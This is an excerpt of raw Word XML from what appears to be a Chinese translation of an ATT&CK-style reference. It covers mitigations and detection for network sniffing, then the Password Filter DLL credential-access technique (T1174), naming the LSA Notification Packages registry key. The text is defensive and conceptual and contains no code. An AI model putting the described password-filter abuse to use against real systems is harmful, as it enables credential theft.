            </w:pPr>
            <w:r w:rsidRPr="00872AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FD2F7C" w14:paraId="2BA62A48" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57EA32F9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FD2F7C" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId162" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00FD2F7C">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>敏感信息加密</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EB25CFD" w14:textId="2902C8A6" w:rsidR="000F2665" w:rsidRPr="00FD2F7C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FD2F7C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保所有有线和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD2F7C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD2F7C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或无线流量均已正确加密。遵循认证协议最佳实践（例如</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD2F7C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Kerberos</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD2F7C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>），并确保可能包含</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD2F7C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD2F7C">
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD2F7C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>eb</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD2F7C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量受到</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD2F7C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSL / TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD2F7C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>保护。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FD2F7C" w14:paraId="70374B8C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20B0D3DD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FD2F7C" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId163" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00FD2F7C">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>多因子认证</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ABC989B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FD2F7C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FD2F7C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尽可能使用多因子身份认证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="145A2084" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609E15BC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB4A677" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测导致网络流量嗅探</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件可能是最好的检测方法。从主机级别来看，攻击者可能需要对有线网络上的其他设备</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间人攻击，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而捕捉非</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来往于当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已入侵</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的流量。信息流的这种变化可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>飞地</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络级别检测到。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>欺骗和免费</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>广播。检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已入侵的</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络设备更具挑战性。需要审核管理员的登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置更改和设备映像才能检测到恶意更改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C62DC8D" w14:textId="501BC528" w:rsidR="000F2665" w:rsidRPr="0096095B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过滤</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="0E66F37F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07B3E558" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t>T1174</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B720576" w14:textId="6AC0E673" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="004844F5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F8A0A3F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需</w:t>
            </w:r>
            <w:r>
              <w:t>权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DB80947" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>动态链接库监控</w:t>
            </w:r>
            <w:r>
              <w:t>，进程监控，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>indows</w:t>
            </w:r>
            <w:r>
              <w:t>注册表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3848AA5B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r>
              <w:t>Vincent Le Toux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56BC3C6D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="003446E4" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E981712" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="003446E4" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB9CF67" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤器提供</w:t>
      </w:r>
      <w:r>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的密码策略实施机制。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤器</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被实现为动态链接库，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它提供了</w:t>
      </w:r>
      <w:r>
        <w:t>一种方法来</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能违反了</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤器</w:t>
      </w:r>
      <w:r>
        <w:t>动态链接库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以位于本地计算机用于验证</w:t>
      </w:r>
      <w:r>
        <w:t>本地账号，</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位于</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域控制器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于验证</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32566F4C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新密码注册</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中之前，</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求每个注册的过滤器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都来验证</w:t>
      </w:r>
      <w:r>
        <w:t>此密码</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在每个注册的过滤器都确认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此密码</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效之前，任何更改都不会生效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F87806" w14:textId="78F3ADD0" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册恶意密码过滤器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从本地计算机和</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或整个域中获取</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。要执行正确的验证，筛选器必须从</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接收纯文本</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。每次提出密码请求时，恶意密码过滤器都会接收这些纯文本</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="005306D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F21479C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="7756"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00872AC7" w14:paraId="446E3F4B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2AC505D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00872AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="637CC3BE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00872AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00C71C0D" w14:paraId="49714EE8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="547EEFF8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C71C0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId164" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00C71C0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>操作系统配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24C8E120" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C71C0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保注册的密码过滤器都有效。域控制器和</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或本地计算机的</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安装目录（默认为</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>C:\Windows\System32\</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）中必须要</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:t>有</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过滤器动态链接库，并且在</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71C0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中有相应的条目。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AED02A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118BC1D9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="006B46FB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控来自</w:t>
      </w:r>
      <w:r>
        <w:t>或去往</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>陌生密码过滤器的更改通知。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39985B01" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="006B46FB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新安装的密码过滤器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须在</w:t>
      </w:r>
      <w:r>
        <w:t>系统重启后才</w:t>
      </w:r>
      <w:r w:rsidRPr="006B46FB">
        <w:rPr>
